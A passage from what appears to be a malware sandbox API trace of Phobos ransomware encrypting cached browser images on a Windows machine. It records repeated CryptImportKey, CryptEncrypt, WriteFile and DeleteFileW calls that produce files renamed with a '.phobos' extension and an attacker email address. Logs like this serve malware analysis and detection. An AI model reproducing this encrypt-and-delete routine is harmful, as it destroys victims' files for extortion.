HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgD9f[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegd9f[1].jpg")) returned 0x2020 [0186.999] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgD9f[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegd9f[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.999] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgD9f[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegd9f[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0186.999] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.999] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0186.999] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgD9f[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegd9f[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0187.000] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0187.000] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0187.000] ReadFile (in: hFile=0x124, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x25f6, lpOverlapped=0x0) returned 1 [0187.002] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2600, dwBufLen=0x2600 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2600) returned 1 [0187.002] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2600, lpOverlapped=0x0) returned 1 [0187.003] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0187.003] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0187.003] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0187.004] CryptDestroyKey (hKey=0xa327e8) returned 1 [0187.004] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0187.004] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0187.004] CloseHandle (hObject=0x124) returned 1 [0187.004] CloseHandle (hObject=0x140) returned 1 [0187.004] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgD9f[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegd9f[1].jpg")) returned 1 [0187.005] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0187.005] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgJfz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegjfz[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0187.006] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2073) returned 1 [0187.006] CloseHandle (hObject=0x140) returned 1 [0187.006] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgJfz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegjfz[1].jpg")) returned 0x2020 [0187.006] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgJfz[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegjfz[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0187.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgJfz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegjfz[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0187.006] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0187.006] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0187.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgJfz[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegjfz[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0187.007] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0187.007] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0187.007] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x819, lpOverlapped=0x0) returned 1 [0187.050] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x820, dwBufLen=0x820 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x820) returned 1 [0187.050] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x820, lpOverlapped=0x0) returned 1 [0187.051] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a68) returned 1 [0187.051] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0187.051] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0187.051] CryptDestroyKey (hKey=0xa32a68) returned 1 [0187.051] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0187.051] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0187.051] CloseHandle (hObject=0x140) returned 1 [0187.051] CloseHandle (hObject=0x124) returned 1 [0187.052] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgJfz[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegjfz[1].jpg")) returned 1 [0187.053] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0187.053] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgsWA[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegswa[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0187.054] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2326) returned 1 [0187.054] CloseHandle (hObject=0x124) returned 1 [0187.054] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgsWA[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegswa[1].jpg")) returned 0x2020 [0187.054] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgsWA[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegswa[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0187.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgsWA[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegswa[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0187.054] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0187.054] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0187.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgsWA[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegswa[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0187.057] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0187.057] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0187.057] ReadFile (in: hFile=0x124, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x916, lpOverlapped=0x0) returned 1 [0187.068] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x920, dwBufLen=0x920 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x920) returned 1 [0187.068] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x920, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x920, lpOverlapped=0x0) returned 1 [0187.069] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0187.069] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0187.069] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0187.069] CryptDestroyKey (hKey=0xa32a28) returned 1 [0187.069] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0187.069] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0187.069] CloseHandle (hObject=0x124) returned 1 [0187.069] CloseHandle (hObject=0x140) returned 1 [0187.070] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBEgsWA[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbegswa[1].jpg")) returned 1 [0187.070] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0187.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBih5H[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbih5h[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0187.071] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=930) returned 1 [0187.071] CloseHandle (hObject=0x140) returned 1 [0187.071] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBih5H[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbih5h[1].png")) returned 0x2020 [0187.071] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBih5H[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbih5h[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0187.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBih5H[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbih5h[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0187.071] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0187.071] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0187.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBih5H[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbih5h[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0187.072] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0187.072] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0187.072] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x3a2, lpOverlapped=0x0) returned 1 [0187.139] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3b0, dwBufLen=0x3b0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3b0) returned 1 [0187.139] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3b0, lpOverlapped=0x0) returned 1 [0187.829] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0187.829] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0187.829] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0187.829] CryptDestroyKey (hKey=0xa32a28) returned 1 [0187.829] WriteFile (in: hFile=0x124, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0187.829] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0187.829] CloseHandle (hObject=0x140) returned 1 [0187.829] CloseHandle (hObject=0x124) returned 1 [0187.829] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBih5H[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbih5h[1].png")) returned 1 [0187.831] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0187.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chrome_logo_2x[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chrome_logo_2x[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0187.831] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=5666) returned 1 [0187.832] CloseHandle (hObject=0x124) returned 1 [0187.832] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chrome_logo_2x[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chrome_logo_2x[1].png")) returned 0x2020 [0187.832] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chrome_logo_2x[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chrome_logo_2x[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0187.832] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chrome_logo_2x[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chrome_logo_2x[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0187.832] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0187.832] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0187.832] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\chrome_logo_2x[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\chrome_logo_2x[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0187.833] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0187.833] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0187.833] ReadFile (in: hFile=0x124, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1622, lpOverlapped=0x0) returned 1 [0187.996] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1630, dwBufLen=0x1630 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1630) returned 1 [0187.996] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1630, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1630, lpOverlapped=0x0) returned 1 